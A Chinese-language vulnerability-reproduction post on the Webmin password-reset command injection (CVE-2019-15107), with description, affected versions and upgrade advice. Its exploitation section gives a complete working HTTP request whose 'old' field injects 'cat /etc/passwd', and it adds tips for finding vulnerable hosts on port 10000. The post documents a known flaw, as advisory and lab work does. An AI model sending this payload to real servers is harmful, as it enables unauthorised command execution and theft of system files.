Webmin远程命令执行漏洞复现

文章目录

  • Webmin_1.910_rce(CVE-2019-15107)
        • 漏洞编号
        • 漏洞描述
        • 影响版本
        • 漏洞评级
        • 利用方法(利用案例)
        • 漏洞挖掘
        • 加固建议
        • 参考信息
        • 漏洞分类

Webmin_1.910_rce(CVE-2019-15107)

漏洞编号

CVE-2019-15107

漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

影响版本

Webmin<=1.920

漏洞评级

严重

利用方法(利用案例)

参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/

payload

payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。

发送如下数据包即可执行命令:cat /etc/passwd

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

user=rootxx&pam=&expired=2&old=test|cat+/etc/passwd&new1=test2&new2=test2

Webmin远程命令执行漏洞复现_第1张图片

漏洞挖掘

指纹特征

查找webmin指纹

Webmin远程命令执行漏洞复现_第2张图片

默认端口

10000是这个系统的默认端口

在目标网站访问这个url:/password_change.cgi

若出现以下界面,说明很可能存在漏洞:

Webmin远程命令执行漏洞复现_第3张图片

加固建议

升级到1.930版本

参考信息

https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

https://www.exploit-db.com/exploits/47230

https://blog.firosolutions.com/exploits/webmin/

https://vulhub.org/#/environments/webmin/CVE-2019-15107/

https://blog.csdn.net/weixin_43486390/article/details/111591676

漏洞分类

远程命令执行漏洞(RCE)

你可能感兴趣的:(漏洞库,漏洞实战,漏洞复现,webmin,远程命令执行,web渗透)